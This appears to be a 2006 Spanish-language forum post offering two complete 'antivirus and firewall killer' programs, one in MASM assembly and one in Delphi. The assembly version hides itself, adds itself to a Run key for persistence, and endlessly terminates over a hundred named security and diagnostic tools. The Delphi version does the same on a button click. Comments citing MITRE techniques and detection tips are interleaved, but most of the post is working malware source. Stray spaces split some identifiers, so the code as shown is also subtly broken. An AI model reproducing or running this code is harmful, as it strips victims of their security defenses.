Autor Tema: EJEMPLO de dos AV/FIREWALL killers  (Leído 262 veces)
Hexentriko
« : 09 de Noviembre de 2006, 05:56:08 »

EJEMPLO EN ASM

CODE 
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; AVKillah 2 by Phr0stic
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
.386
.model flat, stdcall
option casemap:none
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib
include \masm32\include\advapi32.inc
includelib \masm32\lib\advapi32.lib
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
  ; Prototypes for the two procedures defined later in this listing.
  getfile proto :dword,:dword
  FindMe proto :dword
  ; pe32: process-entry record that FindMe passes to Process32First and
  ; Process32Next. FindMe writes dwSize before the first call, reads ID as the
  ; process identifier handed to OpenProcess, and reads szExe as the image path.
  ; NOTE(review): the field order presumably mirrors the Toolhelp
  ; PROCESSENTRY32 record - confirm against the SDK header.
  pe32 struct
     dwSize dword ?
     cntUsage dword ?
     ID dword ?
     th32DefaultHea pID dword ?
     th32ModuleID dword ?
     cntThreads dword ?
     th32ParentProc essID dword ?
     pcPriClassBase dword ?
     dwFlags dword ?
     szExe db 260 dup(?)
  pe32 ends
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Read-only string table.
; sz000..sz124 are executable image names: Windows diagnostic utilities
; (regedit, netstat, tracert, msconfig, sfc, drwatson, ...) and antivirus,
; anti-trojan and personal-firewall products. The entry code passes
; sz001..sz124 to FindMe one by one; sz000 is defined but not referenced in
; the visible code.
; Analyst note: several names are generic (update.exe, clean.exe, guard.exe,
; fast.exe), so the list also matches unrelated software. For triage, a binary
; embedding a long run of security-product image names like this one is a
; common static indicator of defense-impairment tooling (MITRE ATT&CK
; T1562.001).
.const
  sz000 db "regedit.exe",0
  sz001 db "netstat.exe",0
  sz002 db "tracert.exe",0
  sz003 db "msconfig.exe",0
  sz004 db "sysedit.exe",0
  sz005 db "zapro.exe",0
  sz006 db "zonealarm.exe",0
  sz007 db "zatutor.exe",0
  sz008 db "zauinst.exe",0
  sz009 db "minilog.exe",0
  sz010 db "vsmon.exe",0
  sz011 db "navapw32.exe",0
  sz012 db "lockdown.exe",0
  sz013 db "ants.exe",0
  sz014 db "fast.exe",0
  sz015 db "guard.exe",0
  sz016 db "update.exe",0
  sz017 db "autoupdate.exe",0
  sz018 db "tc.exe",0
  sz019 db "spyxx.exe",0
  sz020 db "clean.exe",0
  sz021 db "pview95.exe",0
  sz022 db "drwatson.exe",0
  sz023 db "sfc.exe",0
  sz024 db "msinfo32.exe",0
  sz025 db "nsched32.exe",0
  sz026 db "cleaner.exe",0
  sz027 db "lsetup.exe",0
  sz028 db "aupdate.exe",0
  sz029 db "luall.exe",0
  sz030 db "lucomserver.ex e",0
  sz031 db "luinit.exe",0
  sz032 db "navw32.exe",0
  sz033 db "navstub.exe",0
  sz034 db "bootwarn.exe",0
  sz035 db "qconsole.exe",0
  sz036 db "qserver.exe",0
  sz037 db "navdx.exe",0
  sz038 db "undoboot.exe",0
  sz039 db "cfgwiz.exe",0
  sz040 db "moolive.exe",0
  sz041 db "tca.exe",0
  sz042 db "tcm.exe",0
  sz043 db "tds-3.exe",0
  sz044 db "ss3edit.exe",0
  sz045 db "update.exe",0
  sz046 db "anti-trojan.exe",0
  sz047 db "atcon.exe",0
  sz048 db "atupdater.exe",0
  sz049 db "atwatch.exe",0
  sz050 db "wgfe95.exe",0
  sz051 db "poproxy.exe",0
  sz052 db "nprotect.exe",0
  sz053 db "vsstat.exe",0
  sz054 db "vshwin32.exe",0
  sz055 db "ndd32.exe",0
  sz056 db "mcagent.exe",0
  sz057 db "mcupdate.exe",0
  sz058 db "avpcc.exe",0
  sz059 db "avpm.exe",0
  sz060 db "watchdog.exe",0
  sz061 db "taumon.exe",0
  sz062 db "iamapp.exe",0
  sz063 db "iamserv.exe",0
  sz064 db "lockdown2000.e xe",0
  sz065 db "sphinx.exe",0
  sz066 db "avconsol.exe",0
  sz067 db "webscanx.exe",0
  sz068 db "vsecomr.exe",0
  sz069 db "_avp32.exe",0
  sz070 db "_avpcc.exe",0
  sz071 db "_avpm.exe",0
  sz072 db "avp32.exe",0
  sz073 db "avpcc.exe",0
  sz074 db "avp.exe",0
  sz075 db "pcciomon.exe",0
  sz076 db "icload95.exe",0
  sz077 db "icmon.exe",0
  sz078 db "icsupp95.exe",0
  sz079 db "icloadnt.exe",0
  sz080 db "icsuppnt.exe",0
  sz081 db "frw.exe",0
  sz082 db "firewall.exe",0
  sz083 db "antivirus.exe",0
  sz084 db "blackice.exe",0
  sz085 db "blackd.exe",0
  sz086 db "wrctrl.exe",0
  sz087 db "wradmin.exe",0
  sz088 db "cleaner3.exe",0
  sz089 db "pcfwallicon.ex e",0
  sz090 db "aplica32.exe",0
  sz091 db "cfiadmin.exe",0
  sz092 db "cfiaudit.exe",0
  sz093 db "cfinet32.exe",0
  sz094 db "cfinet.exe",0
  sz095 db "tds2-98.exe",0
  sz096 db "tds2-nt.exe",0
  sz097 db "safeweb.exe",0
  sz098 db "nvarch16.exe",0
  sz099 db "vsmain.exe",0
  sz100 db "persfw.exe",0
  sz101 db "avsynmgr.exe",0
  sz102 db "pavproxy.exe",0
  sz103 db "mssmmc32.exe",0
  sz104 db "trjscan.exe",0
  sz105 db "defwatch.exe",0
  sz106 db "vpc42.exe",0
  sz107 db "rtvscn95.exe",0
  sz108 db "vptray.exe",0
  sz109 db "mgui.exe",0
  sz110 db "apvxdwin.exe",0
  sz111 db "fsav.exe",0
  sz112 db "agentsvr.exe",0
  sz113 db "nmain.exe",0
  sz114 db "nisum.exe",0
  sz115 db "nisserv.exe",0
  sz116 db "taskmon.exe",0
  sz117 db "rrguard.exe",0
  sz118 db "rescue32.exe",0
  sz119 db "rescue.exe",0
  sz120 db "rshell.exe",0
  sz121 db "apimonitor.exe",0
  sz122 db "borg2.exe",0
  sz123 db "W32dsm89.exe",0
  sz124 db "cleanpc.exe",0
  ; Module and export name that the entry code resolves at run time with
  ; GetModuleHandle / GetProcAddress instead of importing statically.
  szK32 db "kernel32.dll",0
  szRSP db "RegisterServic eProcess",0
  ; Autostart location and value name written by the entry code. A value with
  ; this name under the machine-wide Run key is the persistence indicator this
  ; listing leaves behind.
  szRun db "SOFTWARE\Microsoft\Windows\CurrentVersion\Run",0
  szReg db "SysEnum",0
.data?
  hReg dd ?
  szPath db 256 dup(?)
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
.code
; Entry point. Two setup steps run once before the kill loop:
;  1. RegisterServiceProcess is looked up in kernel32.dll at run time. If the
;     lookup returns NULL the call is skipped (jz addme); otherwise it is
;     called with the arguments (0, 1).
;     NOTE(review): this export is a Windows 9x/Me API that, as far as I know,
;     removed the caller from the task list; it should be absent on NT-family
;     systems - confirm.
;  2. The machine-wide Run key is opened and a string value named "SysEnum" is
;     set to this executable's own path, so the program starts again at every
;     logon (MITRE ATT&CK T1547.001, Registry Run Keys).
; None of the registry return codes are checked.
; Detection: audit writes to the Run keys (for example Sysmon event ID 13,
; registry value set) and review autostart entries whose data points outside
; the usual program directories.
start:
invoke GetModuleHandl e, addr szK32
INVOKE   GetProcAddress, EAX, ADDR szRSP
test eax, eax
jz addme
; stdcall: last push is the first argument, so this is the call (0, 1)
push 1
push 0
call eax
addme:
; 80000002h is HKEY_LOCAL_MACHINE; 00020000h+0002h+0004h equals KEY_WRITE
invoke RegOpenKeyEx, 80000002h, addr szRun, 0, 00020000h+0002h+0004h, addr hReg
; module handle 0 = the running executable; eax returns the path length
invoke GetModuleFileN ame, 0, addr szPath, sizeof szPath
; type 1 = REG_SZ; the length argument is the eax left by the previous call
invoke RegSetValueEx, hReg, ADDR szReg, 0, 1, addr szPath, eax
invoke RegCloseKey, hReg
; Main loop: one FindMe call per table entry sz001..sz124, then an
; unconditional jump back to the top. There is no delay call in the loop and
; each FindMe call takes its own process snapshot, so the program enumerates
; processes continuously for as long as it runs.
; Behaviour class: terminating security and diagnostic tools (MITRE ATT&CK
; T1562.001, Impair Defenses: Disable or Modify Tools).
; Defender view: sustained process-snapshot enumeration combined with
; terminate-rights handle requests against security-product processes is a
; high-signal pattern for EDR rules. Current endpoint products counter it with
; self-protection and protected-process status, which deny such handle
; requests from ordinary processes.
hey:
invoke FindMe, addr sz001
invoke FindMe, addr sz002
invoke FindMe, addr sz003
invoke FindMe, addr sz004
invoke FindMe, addr sz005
invoke FindMe, addr sz006
invoke FindMe, addr sz007
invoke FindMe, addr sz008
invoke FindMe, addr sz009
invoke FindMe, addr sz010
invoke FindMe, addr sz011
invoke FindMe, addr sz012
invoke FindMe, addr sz013
invoke FindMe, addr sz014
invoke FindMe, addr sz015
invoke FindMe, addr sz016
invoke FindMe, addr sz017
invoke FindMe, addr sz018
invoke FindMe, addr sz019
invoke FindMe, addr sz020
invoke FindMe, addr sz021
invoke FindMe, addr sz022
invoke FindMe, addr sz023
invoke FindMe, addr sz024
invoke FindMe, addr sz025
invoke FindMe, addr sz026
invoke FindMe, addr sz027
invoke FindMe, addr sz028
invoke FindMe, addr sz029
invoke FindMe, addr sz030
invoke FindMe, addr sz031
invoke FindMe, addr sz032
invoke FindMe, addr sz033
invoke FindMe, addr sz034
invoke FindMe, addr sz035
invoke FindMe, addr sz036
invoke FindMe, addr sz037
invoke FindMe, addr sz038
invoke FindMe, addr sz039
invoke FindMe, addr sz040
invoke FindMe, addr sz041
invoke FindMe, addr sz042
invoke FindMe, addr sz043
invoke FindMe, addr sz044
invoke FindMe, addr sz045
invoke FindMe, addr sz046
invoke FindMe, addr sz047
invoke FindMe, addr sz048
invoke FindMe, addr sz049
invoke FindMe, addr sz050
invoke FindMe, addr sz051
invoke FindMe, addr sz052
invoke FindMe, addr sz053
invoke FindMe, addr sz054
invoke FindMe, addr sz055
invoke FindMe, addr sz056
invoke FindMe, addr sz057
invoke FindMe, addr sz058
invoke FindMe, addr sz059
invoke FindMe, addr sz060
invoke FindMe, addr sz061
invoke FindMe, addr sz062
invoke FindMe, addr sz063
invoke FindMe, addr sz064
invoke FindMe, addr sz065
invoke FindMe, addr sz066
invoke FindMe, addr sz067
invoke FindMe, addr sz068
invoke FindMe, addr sz069
invoke FindMe, addr sz070
invoke FindMe, addr sz071
invoke FindMe, addr sz072
invoke FindMe, addr sz073
invoke FindMe, addr sz074
invoke FindMe, addr sz075
invoke FindMe, addr sz076
invoke FindMe, addr sz077
invoke FindMe, addr sz078
invoke FindMe, addr sz079
invoke FindMe, addr sz080
invoke FindMe, addr sz081
invoke FindMe, addr sz082
invoke FindMe, addr sz083
invoke FindMe, addr sz084
invoke FindMe, addr sz085
invoke FindMe, addr sz086
invoke FindMe, addr sz087
invoke FindMe, addr sz088
invoke FindMe, addr sz089
invoke FindMe, addr sz090
invoke FindMe, addr sz091
invoke FindMe, addr sz092
invoke FindMe, addr sz093
invoke FindMe, addr sz094
invoke FindMe, addr sz095
invoke FindMe, addr sz096
invoke FindMe, addr sz097
invoke FindMe, addr sz098
invoke FindMe, addr sz099
invoke FindMe, addr sz100
invoke FindMe, addr sz101
invoke FindMe, addr sz102
invoke FindMe, addr sz103
invoke FindMe, addr sz104
invoke FindMe, addr sz105
invoke FindMe, addr sz106
invoke FindMe, addr sz107
invoke FindMe, addr sz108
invoke FindMe, addr sz109
invoke FindMe, addr sz110
invoke FindMe, addr sz111
invoke FindMe, addr sz112
invoke FindMe, addr sz113
invoke FindMe, addr sz114
invoke FindMe, addr sz115
invoke FindMe, addr sz116
invoke FindMe, addr sz117
invoke FindMe, addr sz118
invoke FindMe, addr sz119
invoke FindMe, addr sz120
invoke FindMe, addr sz121
invoke FindMe, addr sz122
invoke FindMe, addr sz123
invoke FindMe, addr sz124
jmp hey
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; FindMe: walks a snapshot of running processes and, for each entry whose
; extracted file name compares equal (lstrcmpiA, case-insensitive) to the
; string passed via edi, requests a terminate-only handle and calls
; TerminateProcess with exit code 0.
;   szFile - dword argument supplied by the caller (address of a name string)
; Return values of the snapshot, OpenProcess and TerminateProcess calls are
; not checked.
; Defender view: the API sequence snapshot -> Process32First/Next ->
; OpenProcess(terminate) -> TerminateProcess is what behavioural rules key on;
; on current Windows the handle request fails for protected security processes.
FindMe proc szFile:dword
local lpMoop32:pe32
local szBuffer[256]:byte

mov lpMoop32.dwSiz e, sizeof lpMoop32
; flag 2 = TH32CS_SNAPPROCESS (process list only)
invoke CreateToolhelp 32Snapshot, 2, 0
mov esi, eax
  ; edi is loaded with lea from the szFile parameter and is the first
  ; operand of the comparison below
  lea edi, szFile
invoke Process32First, esi, addr lpMoop32
@@loop:
 ; reduce the entry's path to its file-name part, then compare
 invoke getfile, addr lpMoop32.szExe, addr szBuffer
 invoke lstrcmpiA, edi, addr szBuffer
 test eax, eax
 jnz @@continue
     ; 0001h = PROCESS_TERMINATE access right
     invoke OpenProcess, 0001h, 0, lpMoop32.ID
     invoke TerminateProce ss, eax, 0
@@continue:
     invoke Process32Next, esi, addr lpMoop32
 test eax, eax
 jz @@done
     jmp @@loop
@@done:
 ; release the snapshot handle
 invoke CloseHandle, esi
 ret
FindMe endp
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; getfile: copies the part of a path that follows its last backslash.
;   lppath   - address of a NUL-terminated path string
;   lpbuffer - address of the destination buffer
; The first loop scans lppath to its terminator and records in edx the
; position just after each backslash it meets. The second loop copies bytes
; from edx to lpbuffer until edx reaches the stop address held in ecx.
; edi is saved and restored; eax, ecx and edx are modified.
getfile proc lppath:dword,lpbuffer:dword
push       edi
mov        ecx, lppath
@@:
mov        al, [ecx]
inc          ecx
cmp         al, 0
je            @f
cmp         al, "\"
jne          @b
; remember the position just after this backslash
mov        edx, ecx
jmp         @b
@@:
; ecx := (bytes scanned, terminator included) + edx, used as the stop address
sub         ecx, lppath
add         ecx, edx
mov        edi, lpbuffer
@@:
; byte-by-byte copy from edx to edi
mov        al, [edx]
inc          edx
mov        [edi], al
inc          edi
cmp         edx, ecx
jne          @b
pop         edi
ret
getfile endp
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
end start



--------------------------------------------------------------

EJEMPLO EN DELPHI

CODE 

unit Unit1;

interface

uses
 Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,
 Tlhelp32, StdCtrls;

type
 // Main form of the GUI variant: two group boxes and seventeen buttons, each
 // button wired to its own OnClick handler declared below. The visual layout
 // lives in the form resource, which is not part of this listing.
 TForm1 = class(TForm)
   GroupBox1: TGroupBox;
   Button1: TButton;
   Button2: TButton;
   Button3: TButton;
   Button4: TButton;
   Button5: TButton;
   Button6: TButton;
   Button7: TButton;
   Button8: TButton;
   Button9: TButton;
   Button10: TButton;
   Button11: TButton;
   Button12: TButton;
   Button13: TButton;
   Button14: TButton;
   Button15: TButton;
   GroupBox2: TGroupBox;
   Button16: TButton;
   Button17: TButton;
   procedure Button1Click(Sender: TObject);
   procedure Button2Click(Sender: TObject);
   procedure Button3Click(Sender: TObject);
   procedure Button4Click(Sender: TObject);
   procedure Button5Click(Sender: TObject);
   procedure Button6Click(Sender: TObject);
   procedure Button7Click(Sender: TObject);
   procedure Button8Click(Sender: TObject);
   procedure Button9Click(Sender: TObject);
   procedure Button10Click(Sender: TObject);
   procedure Button11Click(Sender: TObject);
   procedure Button12Click(Sender: TObject);
   procedure Button13Click(Sender: TObject);
   procedure Button14Click(Sender: TObject);
   procedure Button15Click(Sender: TObject);
   procedure Button16Click(Sender: TObject);
   procedure Button17Click(Sender: TObject);
 private
   { Private declarations }
 public
   { Public declarations }
 end;

var
 Form1: TForm1;

implementation

{$R *.DFM}

// KillTask: walks a Toolhelp process snapshot and calls TerminateProcess on
// every entry whose executable name equals ExeFileName, compared in upper
// case against both the bare file name and the full szExeFile value.
// Returns 0 when nothing matched; otherwise the TerminateProcess result of
// the last matching entry, cast to Integer.
// Defender view: this is the behaviour catalogued as MITRE ATT&CK T1562.001
// (Impair Defenses: Disable or Modify Tools). Current endpoint products
// resist it through self-protection and protected-process status, and the
// enumerate-then-terminate sequence against security processes is a common
// behavioural detection.
function KillTask(ExeFileName: string): integer;
const
 // access right requested from OpenProcess: terminate only
 PROCESS_TERMIN ATE=$0001; 
var
 ContinueLoop: BOOL;
 FSnapshotHandl e: THandle;
 FProcessEntry3 2: TProcessEntry3 2; 
begin
 result := 0; 

 // snapshot of the process list only
 FSnapshotHandl e := CreateToolhelp 32Snapshot
                    (TH32CS_SNAPPRO CESS, 0); 
 // dwSize is filled in before the first enumeration call
 FProcessEntry3 2.dwSize := Sizeof(FProcessEntry3 2);
 ContinueLoop := Process32First(FSnapshotHandl e, 
                                FProcessEntry3 2);

 while integer(ContinueLoop) <> 0 do
 begin
   if ((UpperCase(ExtractFileNam e(FProcessEntry3 2.szExeFile)) =
        UpperCase(ExeFileName))
    or (UpperCase(FProcessEntry3 2.szExeFile) =
        UpperCase(ExeFileName))) then
     Result := Integer(TerminateProce ss(OpenProcess(
                       PROCESS_TERMIN ATE, BOOL(0),
                       FProcessEntry3 2.th32ProcessI D), 0)); 
   ContinueLoop := Process32Next(FSnapshotHandl e,
                                 FProcessEntry3 2);
 end; 

 // release the snapshot handle
 CloseHandle(FSnapshotHandl e); 
end;


// Family of parameterless wrappers around KillTask. Each one passes a fixed
// list of executable names, grouped under the product named in the procedure
// identifier. Every wrapper runs inside try/except and leaves silently on any
// exception, so a failure is never reported to the user.
// Analyst note: the hard-coded image names are useful static indicators when
// triaging a binary built from this unit.
procedure killavp;
 begin
 try
 KillTask ('_AVP32.EXE');
 KillTask ('_AVPCC.EXE');
 KillTask ('_AVPM.EXE');
 KillTask ('AVP32.EXE');
 KillTask ('AVPCC.EXE');
 KillTask ('AVPM.EXE');
 KillTask ('AVP.EXE');
 except Exit; end;
 end;

 procedure killnav;
 begin
 try
 KillTask ('NAVAPW32.EXE');
 KillTask ('NAVW32.EXE');
 except Exit; end;
 end;

 procedure killsophos;
 begin
 try
 KillTask ('ICLOAD95.EXE');
 KillTask ('ICMON.EXE');
 KillTask ('ICSUPP95.EXE');
 KillTask ('ICLOADNT.EXE');
 KillTask ('ICSUPPNT.EXE');
 except Exit; end;
 end;

 procedure killpanda;
 begin
 try
 KillTask ('IFACE.EXE');
 except Exit; end;
 end;

 procedure killants;
 begin
 try
 KillTask ('ANTS.EXE');
 except Exit; end;
 end;

 procedure killantitrojan;
 begin
 try
 KillTask ('Anti-Trojan.exe');
 except Exit; end;
 end;

 procedure killatguard;
 begin
 try
 KillTask ('iamapp.exe');
 KillTask ('iamserv.exe');
 except;
 exit;
 end;
 end;

procedure killconseal;
 begin
  try
  KillTask ('FRW.EXE');
  except;
  exit;
  end;
  end;

procedure killblackice;
 begin
 try
  KillTask ('blackice.exe');
  KillTask ('blackd.exe');
  except;
  exit;
  end;
  end;

 procedure killzonealarm;
 begin
 try
  KillTask ('zonealarm.exe');
  KillTask ('vsmon.exe');
  except;
  exit;
  end;
  end;

 procedure killwinroute;
 begin
 try
  KillTask ('WrCtrl.exe');
  KillTask ('WrAdmin.exe');
  KillTask ('WrCtrl.exe');
  except;
  exit;
  end;
  end;

procedure killcleaner;
 begin
  try
  KillTask ('cleaner3.exe');
  KillTask ('cleaner.exe');
  KillTask ('tca.exe');
  KillTask ('MooLive.exe');
  except;
  exit;
  end;
  end;


  procedure killlockdown;
  begin
  try
  KillTask ('lockdown2000.e xe');
  except;
  exit;
  end;
  end;

  procedure killsphinx;
  begin
  try
  KillTask ('Sphinx.exe');
  except;
  exit;
  end;
  end;

  procedure killmcafee;
  begin
  try
  KillTask ('VSHWIN32.EXE');
  KillTask ('VSECOMR.EXE');
  KillTask ('WEBSCANX.EXE');
  KillTask ('AVCONSOL.EXE');
  KillTask  ('VSSTAT.EXE');
  except;
  exit;
  end;
  end;


// OnClick handlers of the form. The first fifteen handlers each call exactly
// one of the kill* wrappers. The sixteenth runs a sequence of wrappers with a
// one-second Sleep between calls. The seventeenth only shows an
// informational message box.
procedure TForm1.Button1 Click(Sender: TObject);
begin
killavp;
end;

procedure TForm1.Button2 Click(Sender: TObject);
begin
killnav;
end;

procedure TForm1.Button3 Click(Sender: TObject);
begin
killsophos;
end;

procedure TForm1.Button4 Click(Sender: TObject);
begin
killpanda;
end;

procedure TForm1.Button5 Click(Sender: TObject);
begin
killants;
end;

procedure TForm1.Button6 Click(Sender: TObject);
begin
killantitrojan;
end;

procedure TForm1.Button7 Click(Sender: TObject);
begin
killatguard;
end;

procedure TForm1.Button8 Click(Sender: TObject);
begin
killconseal;
end;

procedure TForm1.Button9 Click(Sender: TObject);
begin
killblackice;
end;

procedure TForm1.Button1 0Click(Sender: TObject);
begin
killzonealarm;
end;

procedure TForm1.Button1 1Click(Sender: TObject);
begin
killwinroute;
end;

procedure TForm1.Button1 2Click(Sender: TObject);
begin
killcleaner;
end;

procedure TForm1.Button1 3Click(Sender: TObject);
begin
killlockdown;
end;

procedure TForm1.Button1 4Click(Sender: TObject);
begin
killsphinx;
end;

procedure TForm1.Button1 5Click(Sender: TObject);
begin
killmcafee;
end;

// Runs the wrappers below in order; Sleep(1000) blocks the UI thread for one
// second between calls.
procedure TForm1.Button1 6Click(Sender: TObject);
begin
killmcafee;
sleep(1000);
killsphinx;
sleep(1000);
killlockdown;
sleep(1000);
killcleaner;
sleep(1000);
killwinroute;
sleep(1000);
killzonealarm;
sleep(1000);
killblackice;
sleep(1000);
killconseal;
sleep(1000);
killatguard;
sleep(1000);
killantitrojan;
sleep(1000);
killants;
sleep(1000);
killsophos;
sleep(1000);
killnav;
sleep(1000);
killavp;
end;

// "About" button: the message text states the program's purpose in the
// author's own words.
procedure TForm1.Button1 7Click(Sender: TObject);
begin
showmessage('This program is designed to kill all the listed antivirus and firewall programs, you can kill each individually or all together! enjoy');
end;

end.